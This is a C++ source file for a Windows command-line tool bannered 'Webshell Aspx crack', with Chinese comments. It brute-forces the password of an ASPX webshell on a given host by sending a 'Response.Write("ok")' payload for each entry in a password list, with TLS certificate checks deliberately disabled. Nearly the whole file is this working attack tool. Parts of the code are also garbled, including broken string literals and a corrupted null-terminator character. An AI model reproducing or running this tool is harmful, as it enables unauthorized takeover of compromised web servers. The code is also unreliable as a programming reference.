#include "stdafx.h"
#include <stdio.h>
#include <Windows.h>
#include <stdlib.h>
#include <string.h>
#include <string>
#include <winhttp.h>
#pragma comment(lib,"winhttp.lib")
void banner() //显示banner
{
printf("[-]:Webshell Aspx crack T00ls
[-]:Welcome www.90sec.org
");
}
int _tmain(int argc, _TCHAR * argv [])
{
DWORD dwsize = 0;
LPSTR pszOutBuffer;
LPBYTE lpHeader, lpData;
LPCWSTR Host = argv[1];
LPCWSTR Url = argv[2];
char buf[MAX_PATH] = {0}; //fgets接收字符串
FILE* fp;
int i = 0;
if (argc < 4) //如果入口长度小于4
{
banner();
printf("[-]:%S Host Domain_Url Password_List
",argv[0]);
return 0;
}
if ((fp = _wfopen(argv[3],L"rb")) == NULL) //打开文件,如果不存在
{
printf("File not found
"); //打印错误
return 0;
}
while ((fgets(buf,MAX_PATH,fp))) //这儿注意,fgets读取文件,默认一行尾端会增加一个回车,我就是在这儿卡了一晚上
{
buf[strlen(buf) - 2] = '�'; //倒数第二个字符,也就是回车,替换
HINTERNET Hinternet = WinHttpOpen(L"HttpClient 1.0", //定义访问sessions
WINHTTP_ACCESS_TYPE_DEFAULT_PROXY,
WINHTTP_NO_PROXY_NAME,
WINHTTP_NO_PROXY_BYPASS,0);
if (Hinternet == NULL) //如果定义访问的sessions为空
{
printf("Failed to Initialize http sessions
");
return 0;
}
HINTERNET Hconnect = WinHttpConnect(Hinternet, //初始化连接
Host, //定义地址
INTERNET_DEFAULT_HTTPS_PORT,//默认端口443
0);
if (Hconnect == NULL) //如果为空,就close winhttp句柄
{
printf("Hconnect error
");
WinHttpCloseHandle(Hinternet);
return 0;
}
WCHAR* res = new WCHAR[MAX_PATH + 1]; //释放内存,准备写入数据
wsprintf(res,L"%s?%S=Response.Write("ok");Response.End()",Url,buf); //写入字符串到释放内存的变量里
HINTERNET Hrequest = WinHttpOpenRequest(Hconnect, //准备传输,定义好格式
L"GET",
res,
L"HTTP /1.1",
WINHTTP_NO_REFERER,
WINHTTP_DEFAULT_ACCEPT_TYPES,
WINHTTP_FLAG_SECURE|WINHTTP_FLAG_REFRESH);
if (Hrequest == NULL)
{
WinHttpCloseHandle(Hinternet);
WinHttpCloseHandle(Hconnect);
return 0;
}
DWORD dwFlags;
DWORD dwBuffLen = sizeof(dwFlags);
WinHttpQueryOption (Hrequest, WINHTTP_OPTION_SECURITY_FLAGS, //设置查询选项
(LPVOID)&dwFlags, &dwBuffLen);
dwFlags |= SECURITY_FLAG_IGNORE_UNKNOWN_CA;
dwFlags |= SECURITY_FLAG_IGNORE_CERT_DATE_INVALID;
dwFlags |= SECURITY_FLAG_IGNORE_CERT_CN_INVALID;
dwFlags |= SECURITY_FLAG_IGNORE_CERT_WRONG_USAGE;
WinHttpSetOption (Hrequest, WINHTTP_OPTION_SECURITY_FLAGS, //设置选项
&dwFlags, sizeof (dwFlags) );
if (WinHttpSendRequest(Hrequest, //发送数据
WINHTTP_NO_ADDITIONAL_HEADERS,0,
WINHTTP_NO_REQUEST_DATA,0,0,0) == FALSE)
{
DWORD err = GetLastError();
WinHttpCloseHandle(Hrequest);
WinHttpCloseHandle(Hconnect);
WinHttpCloseHandle(Hinternet);
return 0;
}
if (WinHttpReceiveResponse(Hrequest,NULL) == FALSE) //开始读取相应
{
DWORD err = GetLastError();
WinHttpCloseHandle(Hrequest);
WinHttpCloseHandle(Hconnect);
WinHttpCloseHandle(Hinternet);
return 0;
}
DWORD dwSize = 0;
if (!WinHttpQueryDataAvailable( Hrequest, &dwSize)) //检查是否还有数据接受
printf( "Error %u in WinHttpQueryDataAvailable.
",
GetLastError());
WinHttpQueryHeaders(Hrequest, //查看http响应头
WINHTTP_QUERY_RAW_HEADERS_CRLF,
WINHTTP_HEADER_NAME_BY_INDEX,NULL,
&dwsize,WINHTTP_NO_HEADER_INDEX);
lpHeader = (LPBYTE)HeapAlloc(GetProcessHeap(), 0, dwsize);
WinHttpQueryHeaders(Hrequest,
WINHTTP_QUERY_RAW_HEADERS_CRLF,
WINHTTP_HEADER_NAME_BY_INDEX,
lpHeader, &dwsize,
WINHTTP_NO_HEADER_INDEX);
HeapFree(GetProcessHeap(), 0, lpHeader);
DWORD dwDownloaded = 0;
pszOutBuffer = new char[dwSize+1];
if (!pszOutBuffer)
{
printf("Out of memory
");
}
ZeroMemory(pszOutBuffer, dwSize+1);
if (!WinHttpReadData( Hrequest, (LPVOID)pszOutBuffer,
dwSize, &dwDownloaded))
{
printf( "Error %u in WinHttpReadData.
", GetLastError());
}
if (strstr(pszOutBuffer,"ok"))
{
printf("Line:%d-->Find password Success:%s
",++i,buf);
return 0;
}else
{
printf("Line:%d-->password Not found:%s
",++i,buf);
}
}
delete[] pszOutBuffer;
//delete[] res;
return 0;
}